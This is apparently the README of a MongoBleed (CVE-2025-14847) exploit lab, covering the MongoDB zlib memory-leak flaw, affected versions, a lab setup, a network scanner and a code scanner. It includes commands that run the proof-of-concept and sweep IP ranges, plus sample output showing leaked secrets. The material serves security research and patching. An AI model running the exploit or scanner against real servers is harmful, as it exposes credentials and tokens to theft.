Share
## https://sploitus.com/exploit?id=EA7B426E-E450-5B04-BEF3-CBFC34F52EB3
# ๐Ÿฉธ MongoBleed - CVE-2025-14847 Security Research Lab


  



  CVE-2025-14847 | CVSS 8.7 (High) | Unauthenticated Memory Disclosure


---

> **CVE-2025-14847**, dubbed **MongoBleed**, allows unauthenticated remote attackers to exfiltrate uninitialised heap memory by exploiting MongoDB's zlib decompression logic. This high-severity flaw exposes sensitive artifacts, including plain-text credentials and session tokens, providing a road map for lateral movement and full server takeover.

๐Ÿ“– **[Full Documentation โ†’](DOCUMENTATION.md)**

---

## TL;DR for Engineering Teams

| Aspect | Details |
|--------|---------|
| **What is vulnerable** | MongoDB Server network transport layer using zlib compression |
| **Severity** | High (CVSS 8.7/7.5) |
| **Impact** | Unauthenticated, remote disclosure of uninitialised heap memory |
| **Why it matters** | Leaked fragments contain database passwords, AWS secret keys, and internal server states |
| **Exploit status** | Public Proof-of-Concept (PoC) "mongobleed" is validated and circulating |
| **What to do today** | Upgrade to patched versions immediately or disable zlib compression |

### Exposure Scale
- **87,000 - 194,000** MongoDB instances publicly exposed
- **42%** of cloud environments affected (Wiz Research)
- **No authentication required** - exploits pre-auth

## ๐Ÿ”ฌ Vulnerability Anatomy

### Technical Analysis

The vulnerability exists in MongoDB's network transport layer (`message_compressor_zlib.cpp`) where a critical flaw in the zlib decompression logic allows unauthenticated attackers to leak sensitive server memory.

#### Root Cause

```cpp
// VULNERABLE CODE (before fix)
counterHitDecompress(input.length(), output.length());
return {output.length()};  // โŒ Returns ALLOCATED buffer size

// PATCHED CODE (after fix)  
counterHitDecompress(input.length(), output.length());
return length;             // โœ… Returns ACTUAL decompressed data length
```

#### Exploitation Flow

```
โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”
โ”‚                        MongoBleed Attack Vector                             โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚                                                                              โ”‚
โ”‚   ATTACKER                         VULNERABLE MongoDB                        โ”‚
โ”‚      โ”‚                                    โ”‚                                  โ”‚
โ”‚      โ”‚  1. Send OP_COMPRESSED message     โ”‚                                  โ”‚
โ”‚      โ”‚     uncompressedSize: 8192 (LIE)   โ”‚                                  โ”‚
โ”‚      โ”‚     actual data: ~100 bytes        โ”‚                                  โ”‚
โ”‚      โ”‚โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€>                                  โ”‚
โ”‚      โ”‚                                    โ”‚                                  โ”‚
โ”‚      โ”‚                          2. Allocate 8192-byte buffer                 โ”‚
โ”‚      โ”‚                          3. Decompress ~100 bytes                     โ”‚
โ”‚      โ”‚                          4. BUG: Return buffer.length() = 8192        โ”‚
โ”‚      โ”‚                          5. BSON parser reads uninitialized memory    โ”‚
โ”‚      โ”‚                                    โ”‚                                  โ”‚
โ”‚      โ”‚  6. Error response with leaked     โ”‚                                  โ”‚
โ”‚      โ”‚     memory as "field names"        โ”‚                                  โ”‚
โ”‚      โ”‚<โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€                                  โ”‚
โ”‚      โ”‚                                    โ”‚                                  โ”‚
โ”‚   ๐Ÿ”“ LEAKED DATA:                         โ”‚                                  โ”‚
โ”‚      - API keys, passwords, tokens                                           โ”‚
โ”‚      - MongoDB internal state                                                โ”‚
โ”‚      - WiredTiger storage configs                                            โ”‚
โ”‚      - System /proc information                                              โ”‚
โ”‚      - Client connection data                                                โ”‚
โ”‚                                                                              โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜
```

### Affected Versions

| Version | Vulnerable Range | Fixed Version | Status |
|---------|-----------------|---------------|--------|
| **8.2.x** | 8.2.0 - 8.2.2 | **8.2.3** | โœ… Patched |
| **8.0.x** | 8.0.0 - 8.0.16 | **8.0.17** | โœ… Patched |
| **7.0.x** | 7.0.0 - 7.0.27 | **7.0.28** | โœ… Patched |
| **6.0.x** | 6.0.0 - 6.0.26 | **6.0.27** | โœ… Patched |
| **5.0.x** | 5.0.0 - 5.0.31 | **5.0.32** | โœ… Patched |
| **4.4.x** | 4.4.0 - 4.4.29 | **4.4.30** | โœ… Patched |
| **4.2.x** | All versions | None | โš ๏ธ EOL |
| **4.0.x** | All versions | None | โš ๏ธ EOL |
| **3.6.x** | All versions | None | โš ๏ธ EOL |

### Discovery Timeline

| Date | Event |
|------|-------|
| 15 Dec 2025 | Vulnerability identified; internal ticket SERVER-115508 |
| 19 Dec 2025 | Fix released, CVE-2025-14847 disclosed |
| 24 Dec 2025 | MongoDB Atlas fleet patched |
| 26 Dec 2025 | Public PoC "mongobleed" released |
| 28 Dec 2025 | Exploitation observed in the wild |

## ๐Ÿ“ Project Structure

```
mongobleed-exploit-CVE-2025-14847/
โ”œโ”€โ”€ exploit/                    # ๐Ÿ”ด Exploit Lab
โ”‚   โ”œโ”€โ”€ docker-compose.yml      # Vulnerable + Patched MongoDB instances
โ”‚   โ”œโ”€โ”€ mongobleed.py           # Memory leak exploit PoC
โ”‚   โ”œโ”€โ”€ init/init-mongo.js      # Sensitive test data
โ”‚   โ”œโ”€โ”€ test-exploit.sh         # Lab test script
โ”‚   โ””โ”€โ”€ README.md               # Lab documentation
โ”‚
โ”œโ”€โ”€ scanner/                    # ๐ŸŒ Network Scanner
โ”‚   โ”œโ”€โ”€ mongobleed_scanner.py   # IP/domain vulnerability scanner
โ”‚   โ”œโ”€โ”€ sample-targets.txt      # Sample targets file
โ”‚   โ””โ”€โ”€ README.md               # Scanner documentation
โ”‚
โ”œโ”€โ”€ code-scan/                  # ๐Ÿ“‚ Code Scanner
โ”‚   โ”œโ”€โ”€ main.py                 # CLI entry point
โ”‚   โ”œโ”€โ”€ scanners/               # Docker, Python, Infra scanners
โ”‚   โ”œโ”€โ”€ models/                 # Finding, Vulnerability models
โ”‚   โ”œโ”€โ”€ integrations/           # Phoenix Security upload
โ”‚   โ””โ”€โ”€ README.md               # Code scanner documentation
โ”‚
โ””โ”€โ”€ original-exploit/           # ๐Ÿ“š Original PoC reference
```

## ๐Ÿš€ Quick Start

### 1. Exploit Lab

```bash
cd exploit

# Start lab (vulnerable + patched instances)
docker-compose up -d
sleep 10

# Test vulnerable instance (should leak memory)
python3 mongobleed.py --host localhost --port 27017

# Test patched instance (should NOT leak memory)
python3 mongobleed.py --host localhost --port 27018

# Full lab test
./test-exploit.sh
```

### 2. Network Scanner

```bash
cd scanner

# Scan single host
python3 mongobleed_scanner.py 192.168.1.100

# Scan network range
python3 mongobleed_scanner.py 192.168.1.0/24

# Scan from file
python3 mongobleed_scanner.py @sample-targets.txt --json --output results.json
```

### 3. Code Scanner

```bash
cd code-scan

# Scan project for vulnerable MongoDB versions
python3 main.py scan /path/to/project

# Scan and upload to Phoenix
python3 main.py scan /path/to/project --upload-phoenix

# Run tests
python3 main.py test
```

## โšก Quick Commands

```bash
# === EXPLOIT LAB ===
# Start lab
cd exploit && docker-compose up -d && sleep 10

# Run exploit (vulnerable instance)
python3 exploit/mongobleed.py --host localhost --port 27017

# Run exploit (patched instance - verify no leaks)
python3 exploit/mongobleed.py --host localhost --port 27018

# === NETWORK SCANNER ===
# Scan local lab
python3 scanner/mongobleed_scanner.py localhost:27017 localhost:27018

# Scan network
python3 scanner/mongobleed_scanner.py 192.168.1.0/24 --threads 20

# === CODE SCANNER ===
# Scan current directory
python3 code-scan/main.py scan .

# Scan with JSON output
python3 code-scan/main.py scan /path/to/project --json --output results.json

# Scan and upload to Phoenix
python3 code-scan/main.py scan /path/to/project --upload-phoenix
```

## ๐Ÿ“Š Output Examples

### Exploit Output

```
[*] mongobleed - CVE-2025-14847 MongoDB Memory Leak
[*] Target: localhost:27017
[*] Scanning offsets 20-8192...

[+] offset=  117 len=  39: ssions^\u0001๏ฟฝr๏ฟฝ๏ฟฝ*YDr๏ฟฝ๏ฟฝ๏ฟฝ
[+] offset=16582 len=1552: MemAvailable:    8554792 kB\nBuffers: ...
[+] offset=18731 len=3908: MONGOBLEED_PRIVATE_KEY_DATA_123...

[!] TARGET IS VULNERABLE TO CVE-2025-14847
[*] Total leaked: 8748 bytes
[*] Unique fragments: 42

[!] Potential secrets detected:
    โ€ข RSA Private Key
    โ€ข Lab Secret
```

### Network Scanner Output

```
[*] Scanning 254 targets with 10 threads...

[1/254] 192.168.1.10:27017 - 8.2.2 [VULNERABLE - CONFIRMED]
[2/254] 192.168.1.11:27017 - 8.2.3 [SAFE]

SUMMARY:
----------------------------------------
Total targets scanned: 254
Reachable hosts:       12
MongoDB instances:     8
VULNERABLE:            3
```

### Code Scanner Output

```
================================================================================
MONGOBLEED CODE SCANNER REPORT - CVE-2025-14847
================================================================================

๐Ÿšจ VULNERABLE MONGODB VERSIONS DETECTED

1. mongo@8.2.2
   File: /project/docker-compose.yml
   Type: docker-compose
   Reason: Version 8.2.2 is in vulnerable range [8.2.0 - 8.2.2]
   โœ… Upgrade to: 8.2.3
   CVE: CVE-2025-14847
```

## ๐Ÿ”— Phoenix Security Integration

All scanners support uploading findings to Phoenix Security platform:

```bash
# Create config
python3 code-scan/main.py create-config
cp .phoenix.config.TEMPLATE .phoenix.config

# Edit with your credentials
# [phoenix]
# client_id = your_client_id
# client_secret = your_client_secret
# api_base_url = https://api.securityphoenix.cloud

# Scan and upload
python3 code-scan/main.py scan /path/to/project --upload-phoenix
```

## ๐Ÿ” Security Notice

โš ๏ธ **IMPORTANT**: This toolkit is provided for authorized security testing and research purposes only.

- Only test systems you own or have explicit written permission to test
- Unauthorized access to computer systems is illegal
- Leaked data may contain sensitive information - handle responsibly
- Report vulnerabilities through proper disclosure channels

## ๐Ÿ“š Documentation

| Document | Description |
|----------|-------------|
| [**DOCUMENTATION.md**](DOCUMENTATION.md) | Complete project documentation |
| [**TECHNICAL_ANALYSIS.md**](TECHNICAL_ANALYSIS.md) | In-depth vulnerability analysis |
| [**QUICK_COMMANDS.md**](QUICK_COMMANDS.md) | Copy-paste ready commands |
| [exploit/README.md](exploit/README.md) | Exploit lab documentation |
| [scanner/README.md](scanner/README.md) | Network scanner documentation |
| [code-scan/README.md](code-scan/README.md) | Code scanner documentation |

## ๐Ÿ”— External References

- [OX Security Advisory](https://www.ox.security/blog/attackers-could-exploit-zlib-to-exfiltrate-data-cve-2025-14847/)
- [MongoDB Fix Commit](https://github.com/mongodb/mongo/commit/505b660a14698bd2b5233bd94da3917b585c5728)
- [NVD Entry - CVE-2025-14847](https://nvd.nist.gov/vuln/detail/CVE-2025-14847)

## ๐Ÿ‘ค Credits

- Original exploit by **Joe Desimone** ([@dez_](https://x.com/dez_))
- Lab environment and scanner enhancements for security research

## ๐Ÿ“„ License

For authorized security testing only. Use responsibly.

---

**Last Updated**: December 2025